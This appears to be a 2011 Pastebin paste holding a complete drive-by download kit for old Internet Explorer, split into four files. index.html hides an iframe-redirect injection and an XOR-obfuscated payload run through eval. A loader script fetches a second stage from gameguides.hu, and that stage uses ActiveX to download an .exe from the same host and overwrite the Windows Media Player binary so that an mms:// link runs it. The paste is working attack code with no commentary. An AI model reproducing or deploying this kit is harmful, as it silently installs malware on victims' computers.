SHARE
TWEET

bb

a guest Jul 1st, 2011 13,194 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -----------------
  2. index.html script
  3. -----------------
  4.  
  5. <script language="Javascript">
  6. function InjectedDuringRedirection(){
  7. showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-
  8. 10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript'<SCRIPT
  9. SRC=\\'http://gameguides.hu/shellscript_loader.js\\';><\/script>'";
  10. }
  11. </script>
  12.  
  13. <script language="javascript">
  14. setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100
  15. );
  16. setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
  17. document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=0
  18. HEIGHT=0></IFRAME>');
  19. </script>
  20. <script>
  21. x=34;
  22. es="84;66;86;5;73;119;71;89;95;91;12;16;14;88;89;95;86;92;67;27;85;69;9
  23. 3;88;78;94;108;82;78;74;48;105;107;120;73;79;48;38;58;105;37;9;35;41;55
  24. ;111;109;113;61;3;59;37;35;39;118;61;53;56;41;48;59;49;20;79;0;12;0;28;
  25. 93;106;98;6;40;4;8;20;64;28;4;8;30;22;90;23;23;20;19;30;8;20;9;19;26;60
  26. ;239;237;237;241;164;184;166;165;255;225;227;255;233;175;181;130;154;25
  27. 4;208;252;240;236;184;228;236;224;246;254;178;255;241;237;196;196;208;1
  28. 31;153;133;132;208;192;192;222;206;140;156;222;215;146;138;191;185;219;
  29. 247;217;211;193;151;211;213;210;216;204;247;148;140;142;254;227;249;169
  30. ;165;162;172;169;191;236;169;175;187;177;236;242;241;153;134;251;158;14
  31. 0;138;224;182;180;169;179;179;218;135;139;143;129;223;201;200;171;211;1
  32. 82;183;161;172;167;161;222;188;186;167;213;157;130;131;136;195;213;212;
  33. 206;204;201;209;305;305;309;301;310;308;318;297;313;317;317;292;291;352
  34. ;367;358;382;319;369;379;377;303;300;312;373;376;371;373;306;373;362;37
  35. 0;258;257;342;346;340;320;283;261;348;332;338;351;259;341;259;348;339;3
  36. 23;347;323;320;345;339;323;282;263;262;276;339;351;340;346;291;309;380;
  37. 356;383;328;332;296;280;294;314;318;316;355;317;295;319;294;378;358;356
  38. ;357;358;379;376;364;362;363;364;369;382;366;332;321;339;335;324;257;26
  39. 5;260;285;260;271;261;280;323;268;256;276;264;347;328;";
  40. var ds=new String(); ads=es.split(";"); k=ads.length-1;
  41. for(var j=0;j<k;j++)
  42. {e=ads[j];d=e^x;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)
  43. </script>
  44. ---------------------
  45. shellscript_loader.js
  46. ---------------------
  47. function getRealShell() {
  48.     myiframe.document.write("&lt;SCRIPT SRC='http://gameguides.hu/shellscript.js';><\/SCRIPT>");
  49. } document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=0 HEIGHT=0></IFRAME>"); setTimeout("getRealShell()",100);
  50.  
  51. --------------
  52. shellscript.js
  53. --------------
  54.  
  55. var szExt = unescape("%2E%65%78%65");
  56. var szM = unescape("%6D");
  57. var szMMS = szM + szM + "s://";
  58. var szSTR=  unescape("%53%74%72%65%61%6D");
  59. var szADO    = unescape("%41%44%4F%44%42%2E")    + szSTR;
  60. var szMS = "Microsoft"; var szWIN = unescape("%57%69%6E%64%6F%77%73");
  61. var szHTTP = szMS + unescape("%2E%58%4D%4C%48%54%54%50");
  62. var HTTP  =  new ActiveXObject(szHTTP); var METHOD =
  63. unescape("%47%45%54");
  64. var xx1=unescape("%4D%65%64%69%61"); var xx2 =
  65. unescape("%50%6C%61%79%65%72");
  66. var MP1=unescape("%43%3A%5C%5C%50%72%6F%67%72%61%6D"); var MP2 = " " + xx1
  67. + " " + xx2;
  68. var szPL = "pl";
  69. var MP = MP1 + " Files\\" + szWIN + MP2 + "\\wm" + szPL +
  70. unescape("%61%79%65%72") + szExt;
  71. var szURL = "http://gameguides.hu/whatever.exe";;
  72. var i = 8 - 5;
  73. var t = 7 - 6; HTTP.Open(METHOD, szURL, i-3); HTTP.Send();
  74. var ADO = new ActiveXObject(szADO);
  75. ADO.Mode = i; ADO.Type = t;
  76. ADO.Open(); ADO.Write(HTTP.responseBody);
  77. ADO.SaveToFile(MP, i-t); location.href=szMMS;
  78.  
  79. ------
  80. md.htm
  81. ------
  82.  
  83. <SCRIPT language="javascript">
  84. window.returnValue = window.dialogArguments;
  85. function CheckStatus(){
  86. try{tempVar=window.dialogArguments.location.href;}catch(e){window.close
  87. ();}
  88. setTimeout("CheckStatus()",100);
  89. }
  90. CheckStatus();
  91. </SCRIPT>
RAW Paste Data
Top